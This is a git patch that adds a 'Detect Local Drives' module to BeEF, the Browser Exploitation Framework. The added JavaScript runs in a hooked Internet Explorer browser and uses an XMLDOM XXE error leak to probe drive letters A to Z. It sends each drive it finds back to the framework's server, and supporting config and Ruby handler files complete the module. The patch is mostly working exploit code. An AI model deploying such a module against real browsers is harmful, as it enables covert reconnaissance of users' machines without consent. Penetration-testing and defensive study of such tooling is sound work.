From 50855d8f1078fe2fbb9fbbe5135602b882003621 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Fri, 7 Apr 2017 08:32:01 +0000
Subject: [PATCH] Add Detect Local Drives module

---
 modules/host/detect_local_drives/command.js  | 40 ++++++++++++++++++++
 modules/host/detect_local_drives/config.yaml | 16 ++++++++
 modules/host/detect_local_drives/module.rb   | 13 +++++++
 3 files changed, 69 insertions(+)
 create mode 100644 modules/host/detect_local_drives/command.js
 create mode 100644 modules/host/detect_local_drives/config.yaml
 create mode 100644 modules/host/detect_local_drives/module.rb

diff --git a/modules/host/detect_local_drives/command.js b/modules/host/detect_local_drives/command.js
new file mode 100644
index 000000000..653860841
--- /dev/null
+++ b/modules/host/detect_local_drives/command.js
@@ -0,0 +1,40 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  if (!("ActiveXObject" in window)) {
+    beef.debug('[Detect Users] Unspported browser');
+    beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error());
+    return false;
+  }
+
+  function detect_drive(drive) {
+    var dtd = drive + ':\\';
+    var xml = '<?xml version="1.0" ?><!DOCTYPE anything SYSTEM "' + dtd + '">';
+    var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
+    xmlDoc.async = true;
+    try {
+      xmlDoc.loadXML(xml);
+      return xmlDoc.parseError.errorCode == 0 ? true : false;
+    } catch (e) {
+      return true;
+    }
+  }
+
+  // Detect drives: A - Z
+  for (var i = 65; i <= 90; i++) {
+    var drive = String.fromCharCode(i);
+    beef.debug('[Detect Local Drives] Checking for drive: ' + drive);
+    var result = detect_drive(drive);
+    if (result) {
+      beef.debug('[Detect Local Drives] Found drive: ' + drive);
+      beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found drive: ' + drive, beef.are.status_success());
+    }
+  }
+
+});
+
diff --git a/modules/host/detect_local_drives/config.yaml b/modules/host/detect_local_drives/config.yaml
new file mode 100644
index 000000000..fa660c86f
--- /dev/null
+++ b/modules/host/detect_local_drives/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_local_drives:
+            enable: true
+            category: "Host"
+            name: "Detect Local Drives"
+            description: "This module attempts to detect local drives on the user's system using <a href='https://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/'>Internet Explorer XMLDOM XXE</a> discovered by Soroush Dalili (@irsdl)."
+            authors: ["bcoles"]
+            target:
+                working: ["IE"]
+                not_working: ["ALL"]
diff --git a/modules/host/detect_local_drives/module.rb b/modules/host/detect_local_drives/module.rb
new file mode 100644
index 000000000..66e04573e
--- /dev/null
+++ b/modules/host/detect_local_drives/module.rb
@@ -0,0 +1,13 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Detect_local_drives < BeEF::Core::Command
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result'] if not @datastore['result'].nil?
+    save content
+  end
+end